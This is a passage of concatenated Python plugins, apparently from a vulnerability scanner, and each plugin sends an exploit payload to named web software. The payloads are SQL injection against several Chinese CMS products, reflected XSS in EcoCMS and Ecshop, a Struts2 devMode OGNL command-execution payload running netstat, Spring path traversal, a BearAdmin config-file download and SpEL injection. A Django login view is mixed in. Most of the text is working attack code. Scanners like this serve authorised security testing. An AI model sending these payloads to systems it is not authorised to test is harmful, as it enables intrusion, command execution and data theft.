            'cookie': 'sort_field_idx=1=extractvalue(1,concat(0x5c,md5(1)))',
        }
        session = requests.session()
        resp = session.post(payload_url,
                            headers=headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        body = resp.text
        digest_found = body.find("c4ca4238a0b923820dcc509a6f75849") != -1
        if resp.status_code == 200 and digest_found:
            report = (
                f"{url}存在EasethinkCookie注入漏洞\r\n 验证数据:\r\n"
                f"Url:{payload_url}\r\n返回结果:{body}\r\n"
            )
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, url, Token).Write()
            WriteFile().result(str(url), str(report))
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        # Log carries the target and the plugin name (not the exception).
        ErrorLog().Write(url, plugin)
def medusa(Url,RandomAgent,proxies=None,**kwargs):
    """Check *Url* for SQL injection in several ECGAP ``.aspx`` endpoints.

    For each path in the candidate list a GET appends
    ``'and/**/1=sys.fn_varbintohexstr(hashbytes('MD5','1234'))--`` (MSSQL) to
    the query string.  A path is reported (``VulnerabilityDetails`` and
    ``WriteFile``) when the response is 200 and contains
    ``81dc9bdb52d04dc20036dbd8313ed055``, the MD5 of ``1234``.  Every path is
    probed independently; an exception in one is logged via
    ``ErrorHandling``/``ErrorLog`` and the loop continues.

    Args:
        Url: target, parsed by ``UrlProcessing().result``.
        RandomAgent: value for the ``User-Agent`` header.
        proxies: optional proxy spec, normalised by ``Proxies().result``.
        **kwargs: forwarded to ``VulnerabilityDetails``.

    TLS verification is disabled (``verify=False``).
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Fall back to the scheme's well-known port when the URL carried none.
    if port is None:
        port = {'https': 443, 'http': 80}.get(scheme)
    base = f"{scheme}://{url}:{port}"
    injection = "%27and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--"
    headers = {
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
    }
    candidate_paths = (
        "/Bulletin/QAList.aspx?infoflowId=",
        "/Bulletin/PolicyDownLoad.aspx?ID=",
        "/Bulletin/PolicyList.aspx?infoflowId=",
        "/login/TransactList.aspx?ItemName=1",
    )
    for path in candidate_paths:
        try:
            payload_url = base + path + injection
            resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=6, verify=False)
            body = resp.text
            digest_found = body.find("81dc9bdb52d04dc20036dbd8313ed055") != -1
            if resp.status_code == 200 and digest_found:
                report = (
                    f"{url}存在ECGAPSQL注入漏洞\r\n 验证数据:\r\n"
                    f"Url:{payload_url}\r\n返回结果:{body}\r\n"
                )
                info = VulnerabilityInfo(report)
                VulnerabilityDetails(info.info, url, **kwargs).Write()
                WriteFile().result(str(url), str(report))
        except Exception as e:
            plugin = VulnerabilityInfo('').info.get('algroup')
            ErrorHandling().Outlier(e, plugin)
            ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + url, e)
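def medusa(Url, RandomAgent, UnixTimestamp):
    """Check *Url* for the CmsTop ``template/edit.php`` path disclosure.

    GETs two candidate paths of ``apps/system/view/template/edit.php``.  A
    path is reported (``VulnerabilityDetails``/``WriteFile``) when the body
    carries a PHP error trailer of the form
    ``in <b>/some/path</b> on line <b>N</b>``, which leaks the install
    directory.  Each path is probed independently; an exception in one is
    logged via ``ErrorHandling``/``ErrorLog`` and the loop continues.

    Args:
        Url: target, parsed by ``UrlProcessing().result``.
        RandomAgent: value for the ``User-Agent`` header.
        UnixTimestamp: forwarded to ``VulnerabilityDetails``.

    Fix over the previous revision: the PHP-error pattern was passed to
    ``str.find`` as a literal, so the check looked for the text
    ``([^<]+)``/``(\\d+)`` itself and could never match a real error page.
    It is now applied with ``re.search``.  No proxy support; TLS
    verification is disabled (``verify=False``).
    """
    import re

    scheme, url, port = UrlProcessing().result(Url)
    # Fall back to the scheme's well-known port when the URL carried none.
    if port is None:
        port = {'https': 443, 'http': 80}.get(scheme)
    # Trailer PHP appends to warnings/fatals when display_errors is on.
    php_error = re.compile(r' in <b>([^<]+)</b> on line <b>(\d+)</b>')
    Payloads = [
        "/cmstop/apps/system/view/template/edit.php",
        "/apps/system/view/template/edit.php"
    ]
    for payload in Payloads:
        try:
            payload_url = scheme + "://" + url + ":" + str(port) + payload
            headers = {
                'User-Agent':
                RandomAgent,
                'Accept':
                'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
            }
            resp = requests.get(payload_url,
                                headers=headers,
                                timeout=6,
                                verify=False)
            con = resp.text
            if php_error.search(con) is not None:
                Medusa = "{}存在CmsTop文件路径漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                    url, payload_url, con)
                _t = VulnerabilityInfo(Medusa)
                VulnerabilityDetails(_t.info, url,
                                     UnixTimestamp).Write()  # url and the evidence
                WriteFile().result(str(url),
                                   str(Medusa))  # file name is the target url
        except Exception as e:
            _ = VulnerabilityInfo('').info.get('algroup')
            ErrorHandling().Outlier(e, _)
            _l = ErrorLog().Write(url, _)  # logs target url and plugin name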
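def Login(request):
    """Authenticate a user and rotate their API token (Django view).

    POST body: JSON ``{"username": ..., "passwd": ...}``.  On a successful
    ``UserInfo().UserLogin`` a new 250-character token is drawn from
    ``randoms().result`` until ``QueryTokenValidity`` reports no collision,
    stored with ``UpdateToken`` and returned as ``message`` with code 200.
    Wrong credentials → 604; non-POST → 500; any other failure → 169.

    Fixes over the previous revision: when ``UpdateToken`` returned falsy,
    or when any exception occurred, the view fell off the end without
    returning an ``HttpResponse`` (Django then raises); both paths now answer
    with JSON like the sibling views.  The body is parsed once instead of
    twice.

    NOTE(review): the token is a bearer credential — confirm
    ``randoms().result`` is backed by ``secrets``/``os.urandom`` rather than
    ``random``.  Whether ``UserLogin`` compares a password hash is not
    visible from here.
    """
    RequestLogRecord(request, request_api="login")
    if request.method != "POST":
        return JsonResponse({
            'message': '请使用Post请求',
            'code': 500,
        })
    try:
        body = json.loads(request.body)
        Username = body["username"]
        Passwd = body["passwd"]
        if UserInfo().UserLogin(Username, Passwd) is None:
            return JsonResponse({
                'message': '账号或密码错误',
                'code': 604,
            })
        # Every successful login rotates the token; redraw on a collision.
        while True:
            Token = randoms().result(250)
            if not UserInfo().QueryTokenValidity(Token):
                break
        if not UserInfo().UpdateToken(name=Username, token=Token):
            return JsonResponse({
                'message': 'Token更新失败',
                'code': 404,
            })
        Uid = UserInfo().QueryUidWithToken(Token)
        UserOperationLogRecord(request, request_api="login", uid=Uid)
        return JsonResponse({
            'message': Token,
            'code': 200,
        })
    except Exception as e:
        ErrorLog().Write("Web_Api_User_LogIn(def)", e)
        return JsonResponse({
            'message': '莎酱被玩坏啦(>^ω^<)喵',
            'code': 169,
        })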
def medusa(Url, RandomAgent, Token, proxies=None):
    """Check *Url* for the EcoCMS reflected XSS in ``admin.php?p=``.

    GETs ``/admin.php?p=1"><script>alert(/<random>/)</script>`` and reports
    the target (``VulnerabilityDetails``/``WriteFile``) when the response is
    200 and contains ``>alert(/<random>/)`` unescaped.  Exceptions go to
    ``ErrorHandling``/``ErrorLog`` and are swallowed.

    Args:
        Url: target, parsed by ``UrlProcessing().result``.
        RandomAgent: value for the ``User-Agent`` header.
        Token: scan token handed to ``VulnerabilityDetails``.
        proxies: optional proxy spec, normalised by ``Proxies().result``.

    TLS verification is disabled (``verify=False``).
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Fall back to the scheme's well-known port when the URL carried none.
    if port is None:
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        marker = randoms().result(20)
        payload = "/admin.php?p=1%22%3E%3Cscript%3Ealert%28/{}/%29%3C/script%3E".format(marker)
        payload_url = f"{scheme}://{url}:{port}{payload}"
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }
        resp = requests.get(payload_url,
                            headers=headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        body = resp.text
        reflected = body.find(">alert(/{}/)".format(marker)) != -1
        if resp.status_code == 200 and reflected:
            report = (
                f"{url}存在EcoCMS跨站脚本漏洞\r\n漏洞地址:\r\n"
                f"{payload_url}\r\n漏洞详情:{body}\r\n"
            )
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, url, Token).Write()
            WriteFile().result(str(url), str(report))
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        # Log carries the target and the plugin name (not the exception).
        ErrorLog().Write(url, plugin)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check *Url* for the EmpireCMS ``pf/rate.php`` SQL injection.

    GETs ``/pf/rate.php?id=-1 UNION ALL SELECT NULL,CONCAT(0x23,0x747971,0x23)--``;
    the concat yields ``#tyq#``, so the target is reported
    (``VulnerabilityDetails``/``WriteFile``) when the response is 200 and
    contains that string.  Exceptions go to ``ErrorHandling``/``ErrorLog``
    and are swallowed.

    Args:
        Url: target, parsed by ``UrlProcessing().result``.
        RandomAgent: value for the ``User-Agent`` header.
        proxies: optional proxy spec, normalised by ``Proxies().result``.
        **kwargs: forwarded to ``VulnerabilityDetails``.

    TLS verification is disabled (``verify=False``).
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Fall back to the scheme's well-known port when the URL carried none.
    if port is None:
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        payload = '/pf/rate.php?id=-1+UNION+ALL+SELECT+NULL,CONCAT(0x23,0x747971,0x23)--'
        payload_url = f"{scheme}://{url}:{port}{payload}"

        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }
        resp = requests.get(payload_url,
                            headers=headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        body = resp.text
        # 0x23 0x747971 0x23 == "#tyq#"
        if resp.status_code == 200 and body.find("#tyq#") != -1:
            report = (
                f"{url}存在EmpireCMSSQL注入漏洞\r\n漏洞地址:\r\n"
                f"{payload_url}\r\n漏洞详情:{body}\r\n"
            )
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, url, **kwargs).Write()
            WriteFile().result(str(url), str(report))
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        # Log carries the target and the plugin name (not the exception).
        ErrorLog().Write(url, plugin)
def medusa(Url, RandomAgent, Token, proxies=None):
    """Scanner plugin: one GET probe for the YiXiang ``/subscribe.php`` SQL injection.

    Args:
        Url: Target as handed to the scanner; split by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        Token: Passed through to ``VulnerabilityDetails`` on a hit.
        proxies: Proxy specification, normalised through ``Proxies().result``.

    Returns:
        None. A hit is an HTTP 200 whose body contains the fixed hash marker
        checked below; it is recorded through ``VulnerabilityDetails`` and
        ``WriteFile``. Exceptions go to ``ErrorHandling``/``ErrorLog``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when the URL did not specify one.
    if port is None:
        port = 443 if scheme == 'https' else (80 if scheme == 'http' else None)
    try:
        probe_path = "/subscribe.php?act=unsubscribe&code=YScgYW5kKHNlbGVjdCAxIGZyb20oc2VsZWN0IGNvdW50KCopLGNvbmNhdCgoc2VsZWN0IChzZWxlY3QgKHNlbGVjdCBjb25jYXQoMHg3ZSxtZDUoNjY2KSwweDdlKSkpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyBsaW1pdCAwLDEpLGZsb29yKHJhbmQoMCkqMikpeCBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgZ3JvdXAgYnkgeClhKSM="
        payload_url = "{}://{}:{}{}".format(scheme, url, port, probe_path)
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }
        resp = requests.get(
            payload_url,
            headers=request_headers,
            timeout=6,
            proxies=proxies,
            verify=False,
        )
        body = resp.text
        marker = "fae0b27c451c728867a567e8c1bb4e53"
        if resp.status_code == 200 and marker in body:
            Medusa = "{}存在YiXiangSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format(
                url, payload_url, body)
            finding = VulnerabilityInfo(Medusa)
            # Store the finding together with the target url and the caller's token.
            VulnerabilityDetails(finding.info, url, Token).Write()
            # url doubles as the output file name; Medusa is the recorded result.
            WriteFile().result(str(url), str(Medusa))
    except Exception as exc:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(exc, plugin_name)
        ErrorLog().Write(url, plugin_name)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Scanner plugin: one GET probe for the EnableQ ``Export.log.inc.php`` SQL injection.

    Args:
        Url: Target as handed to the scanner; split by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        proxies: Proxy specification, normalised through ``Proxies().result``.
        **kwargs: Forwarded unchanged to ``VulnerabilityDetails`` on a hit.

    Returns:
        None. The probe's ``ExportSQL`` parameter carries a base64-encoded,
        URL-quoted statement; a hit is a response body containing the fixed
        hash marker checked below (the status code is not consulted). Hits
        go to ``VulnerabilityDetails``/``WriteFile``, exceptions to
        ``ErrorHandling``/``ErrorLog``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when the URL did not specify one.
    if port is None:
        port = 443 if scheme == 'https' else (80 if scheme == 'http' else None)
    try:
        statement = "SELECT md5('testvul') as administratorsName"
        encoded = base64.b64encode(statement.encode('utf-8')).decode('ascii')
        probe_path = "/Export/Export.log.inc.php?ExportSQL=" + urllib.parse.quote(encoded)
        payload_url = "{}://{}:{}{}".format(scheme, url, port, probe_path)
        request_headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }
        resp = requests.get(
            payload_url,
            headers=request_headers,
            timeout=6,
            proxies=proxies,
            verify=False,
        )
        body = resp.text
        if "e87ebbaed6f97f26e222e030eddbad1c" in body:
            Medusa = "{}存在EnableQSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, body)
            finding = VulnerabilityInfo(Medusa)
            # Store the finding with the target url and the caller's extra context.
            VulnerabilityDetails(finding.info, url, **kwargs).Write()
            # url doubles as the output file name; Medusa is the recorded result.
            WriteFile().result(str(url), str(Medusa))
    except Exception as exc:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(exc, plugin_name)
        ErrorLog().Write(url, plugin_name)
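def medusa(Url, RandomAgent, ProxyIp):
    """Scanner plugin: one POST probe for the ChanZhiEPS ``/user-edit.html`` SQL injection.

    Args:
        Url: Target as handed to the scanner; split by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        ProxyIp: Accepted for interface compatibility only; it is never read,
            so the request is sent without a proxy.

    Returns:
        None. A hit is a response body containing the fixed hash marker
        checked below; it is rated with ``VulnerabilityDetails(...).High()``
        and written with ``WriteFile``. Exceptions are swallowed after a
        single ``ErrorLog`` entry naming the plugin -- the exception object
        itself is not recorded, unlike sibling plugins that call
        ``ErrorHandling``.
    """
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when the URL did not specify one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = "/user-edit.html"
        data = "realname=aaaaaa'&email=z%40qq.com&password1=&password2=&company=&address=&zipcode=&mobile=&phone=&`admin=md5%28c%29"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }
        # Use the session as a context manager so its connection pool is
        # released when the probe finishes instead of lingering until GC.
        with requests.session() as s:
            resp = s.post(payload_url,
                          data=data,
                          headers=headers,
                          timeout=6,
                          verify=False)
            con = resp.text
        if con.find("4a8a08f09d37b73795649038408b5f33") != -1:
            Medusa = "{}存在ChanZhiEPSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            web = VulnerabilityDetails(_t.info)
            # Severity ladder: serious > High > Intermediate > Low.
            web.High()
            # url doubles as the output file name; Medusa is the recorded result.
            WriteFile().result(str(url), str(Medusa))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        # Only the target and plugin name are logged; the exception is dropped.
        _l = ErrorLog().Write(url, _)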
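def medusa(Url, RandomAgent, UnixTimestamp):
    """Scanner plugin: one GET probe for a 74CMS ``street-search.php`` SQL injection.

    Args:
        Url: Target as handed to the scanner.
        RandomAgent: Value sent as the ``User-Agent`` header.
        UnixTimestamp: Passed through to ``VulnerabilityDetails`` on a hit.

    Returns:
        None. A hit is an HTTP 200 whose body contains both ``Error`` and
        ``ORDER BY``; it is recorded through ``VulnerabilityDetails`` and
        ``WriteFile``. Exceptions go to ``ErrorHandling``/``ErrorLog``.
    """
    # NOTE(review): sibling plugins call UrlProcessing().result(Url); this
    # direct call is kept as written -- confirm it returns the same triple.
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme only when the URL did not specify one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = "/jobs/street-search.php?sort=wage%3Edesc%27&page=1&streetid=&inforow="
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }
        # Use the session as a context manager so its connection pool is
        # released when the probe finishes instead of lingering until GC.
        with requests.session() as s:
            resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
            con = resp.text
            code = resp.status_code
        if code == 200 and 'Error' in con and 'ORDER BY' in con:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Store the finding with the target url and the scan timestamp.
            VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()
            # url doubles as the output file name; Medusa is the recorded result.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # The error log receives the target and the failing plugin's name.
        ErrorLog().Write(url, _)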
def medusa(Url, RandomAgent, Token, proxies=None):
    """Scanner plugin: one GET probe for the Struts2 devMode (S2-Devmode) issue.

    Args:
        Url: Target as handed to the scanner; split by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        Token: Passed through to ``VulnerabilityDetails`` on a hit.
        proxies: Proxy specification, normalised through ``Proxies().result``.

    Returns:
        None. The response body is classified by ``Result``; a value of
        ``"Linux"``, ``"NoteOS"`` or ``"Windows"`` counts as a hit and is
        recorded through ``VulnerabilityDetails`` and ``WriteFile``.
        Exceptions go to ``ErrorHandling``/``ErrorLog``.

    Note:
        The report template has two placeholders but is given three
        arguments; the classification result is therefore not part of the
        written report. Kept as in the original.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when the URL did not specify one.
    if port is None:
        port = 443 if scheme == 'https' else (80 if scheme == 'http' else None)
    query = '''?debug=browser&object=(%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=netstat%20-an'''
    try:
        payload_url = "{}://{}:{}/index.action{}".format(scheme, url, port, query)
        request_headers = {
            'User-Agent': RandomAgent,
            "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
            "Content-Type": "application/x-www-form-urlencoded",
        }
        resp = requests.get(
            payload_url,
            headers=request_headers,
            proxies=proxies,
            timeout=6,
            verify=False,
        )
        body = resp.text
        os_guess = Result(body)
        if os_guess in ("Linux", "NoteOS", "Windows"):
            Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-Devmode\r\n返回数据:{}\r\n".format(
                url, body, os_guess)
            finding = VulnerabilityInfo(Medusa)
            # Store the finding together with the target url and the caller's token.
            VulnerabilityDetails(finding.info, url, Token).Write()
            # url doubles as the output file name; Medusa is the recorded result.
            WriteFile().result(str(url), str(Medusa))
    except Exception as exc:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(exc, plugin_name)
        ErrorLog().Write(url, plugin_name)
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Scanner plugin: one POST probe for reflected XSS in Ecshop ``mobile/user.php``.

    Args:
        Url: Target as handed to the scanner; split by ``UrlProcessing``.
        Headers: Request headers sent as-is (this plugin does not build its own).
        proxies: Proxy specification, normalised through ``Proxies().result``.
        **kwargs: Forwarded unchanged to ``VulnerabilityDetails`` on a hit.

    Returns:
        None. A random 20-character token from ``randoms().result(20)`` is
        embedded in the ``username`` field; a hit is an HTTP 200 whose body
        echoes the exact ``<script>alert(<token>)</script>`` string back.
        Hits go to ``VulnerabilityDetails``/``WriteFile``, exceptions to
        ``ErrorHandling``/``ErrorLog`` (here with plugin name and target in
        the log line).
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when the URL did not specify one.
    if port is None:
        port = 443 if scheme == 'https' else (80 if scheme == 'http' else None)
    try:
        token = randoms().result(20)
        payload_url = "{}://{}:{}{}".format(scheme, url, port, '/mobile/user.php?act=act_register')
        form_body = 'username=networks<script>alert({})</script>&[email protected]&password=woaini&confirm_password=woaini&act=act_register&back_act='.format(token)
        resp = requests.post(
            payload_url,
            data=form_body,
            headers=Headers,
            timeout=6,
            proxies=proxies,
            verify=False,
        )
        body = resp.text
        echoed = "<script>alert({})</script>".format(token)
        if resp.status_code == 200 and echoed in body:
            Medusa = "{}存在Ecshop跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, body)
            finding = VulnerabilityInfo(Medusa)
            # Store the finding with the target url and the caller's extra context.
            VulnerabilityDetails(finding.info, url, **kwargs).Write()
            # url doubles as the output file name; Medusa is the recorded result.
            WriteFile().result(str(url), str(Medusa))
    except Exception as exc:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(exc, plugin_name)
        ErrorLog().Write("Plugin Name:" + plugin_name + " || Target Url:" + url, exc)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Scanner plugin: GET probes for the Spring Cloud Config traversal (CVE-2020-5405).

    Args:
        Url: Target as handed to the scanner; split by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        proxies: Proxy specification, normalised through ``Proxies().result``.
        **kwargs: Forwarded unchanged to ``VulnerabilityDetails`` on a hit.

    Returns:
        None. Four path variants are tried in order, each in its own
        ``try`` so one failure does not stop the others. A hit is an HTTP
        200 (redirects are not followed) whose body contains ``root:x:``,
        ``bin:x`` and ``lp:x``; note that this match condition only fits
        passwd-style content, so the two ``win.ini`` variants can never
        satisfy it as written. Hits go to ``VulnerabilityDetails``/
        ``WriteFile``, exceptions to ``ErrorHandling``/``ErrorLog``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when the URL did not specify one.
    if port is None:
        port = 443 if scheme == 'https' else (80 if scheme == 'http' else None)
    probe_paths = (
        "/foo/profiles/..%28_%29Windows/win.ini",
        "/foo/profiles/..%28_%29etc/hosts.allow",
        "/foo/profiles/%252f..%252f..%252f..%252fetc/hosts.allow",
        "/foo/profiles/%252f..%252f..%252f..%252fWindows/win.ini",
    )
    for probe_path in probe_paths:
        try:
            payload_url = "{}://{}:{}{}".format(scheme, url, port, probe_path)
            request_headers = {
                'User-Agent': RandomAgent,
                'Accept': '*/*',
                'Accept-Encoding': 'gzip, deflate',
                'Accept-Language': 'en',
                'Connection': 'close',
                "Upgrade-Insecure-Requests": "1",
            }
            resp = requests.get(
                payload_url,
                headers=request_headers,
                proxies=proxies,
                timeout=6,
                verify=False,
                allow_redirects=False,
            )
            body = resp.text
            looks_like_passwd = all(
                marker in body for marker in ("root:x:", "bin:x", "lp:x"))
            if resp.status_code == 200 and looks_like_passwd:
                Medusa = "{} 存在Spring反射文件下载漏洞(CVE-2020-5405)\r\n漏洞地址:\r\n{}\r\n返回内容:\r\n{}".format(url, payload_url, body)
                finding = VulnerabilityInfo(Medusa)
                # Store the finding with the target url and the caller's extra context.
                VulnerabilityDetails(finding.info, url, **kwargs).Write()
                # url doubles as the output file name; Medusa is the recorded result.
                WriteFile().result(str(url), str(Medusa))
        except Exception as exc:
            plugin_name = VulnerabilityInfo('').info.get('algroup')
            ErrorHandling().Outlier(exc, plugin_name)
            ErrorLog().Write("Plugin Name:" + plugin_name + " || Target Url:" + url, exc)
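def medusa(Url, RandomAgent, UnixTimestamp):
    """Scanner plugin: one GET probe for the BearAdmin ``databack/download`` file read.

    Args:
        Url: Target as handed to the scanner.
        RandomAgent: Value sent as the ``User-Agent`` header.
        UnixTimestamp: Passed through to ``VulnerabilityDetails`` on a hit.

    Returns:
        None. A hit is an HTTP 200 whose body contains the string
        ``数据库名``; it is recorded through ``VulnerabilityDetails`` and
        ``WriteFile``. Exceptions go to ``ErrorHandling``/``ErrorLog``.
    """
    # NOTE(review): sibling plugins call UrlProcessing().result(Url); this
    # direct call is kept as written -- confirm it returns the same triple.
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme only when the URL did not specify one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = "/admin/databack/download.html?name=../application/database.php"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }
        # Use the session as a context manager so its connection pool is
        # released when the probe finishes instead of lingering until GC.
        with requests.session() as s:
            resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
            con = resp.text
            code = resp.status_code
        if code == 200 and "数据库名" in con:
            Medusa = "{}存在BearAdmin任意文件下载漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Store the finding with the target url and the scan timestamp.
            VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()
            # url doubles as the output file name; Medusa is the recorded result.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # The error log receives the target and the failing plugin's name.
        ErrorLog().Write(url, _)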
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Scanner plugin: one GET probe for SpEL injection in Spring Boot (CNVD-2016-04742).

    Args:
        Url: Target as handed to the scanner; split by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        proxies: Proxy specification, normalised through ``Proxies().result``.
        **kwargs: Forwarded unchanged to ``VulnerabilityDetails`` on a hit.

    Returns:
        None. The probe's ``payload`` parameter builds a fixed string from a
        byte array; a hit is a response body that, lower-cased, contains the
        fixed hash marker checked below (the original author notes it is
        md5 of ``wooyun``). The status code is not consulted. Hits go to
        ``VulnerabilityDetails``/``WriteFile``, exceptions to
        ``ErrorHandling``/``ErrorLog``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when the URL did not specify one.
    if port is None:
        port = 443 if scheme == 'https' else (80 if scheme == 'http' else None)
    try:
        request_headers = {
            'User-Agent': RandomAgent,
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        probe_path = "/?payload=${new%20java.lang.String(new%20byte[]{70, 66, 66, 50, 48, 52, 65, 52, 48, 54, 49, 70, 70, 66, 68, 52, 49, 50, 56, 52, 65, 56, 52, 67, 50, 53, 56, 67, 49, 66, 70, 66})}"
        payload_url = "{}://{}:{}{}".format(scheme, url, port, probe_path)
        resp = requests.get(
            payload_url,
            headers=request_headers,
            proxies=proxies,
            timeout=6,
            verify=False,
        )
        body = resp.text
        # Case-insensitive check: the marker is compared against the lower-cased body.
        if "fbb204a4061ffbd41284a84c258c1bfb" in body.lower():
            Medusa = "{}存在SpringBoot框架SPEL表达式注入漏洞(CNVD-2016-04742)\r\n验证数据:\r\n返回内容:{}\r\n".format(
                url, body)
            finding = VulnerabilityInfo(Medusa)
            # Store the finding with the target url and the caller's extra context.
            VulnerabilityDetails(finding.info, url, **kwargs).Write()
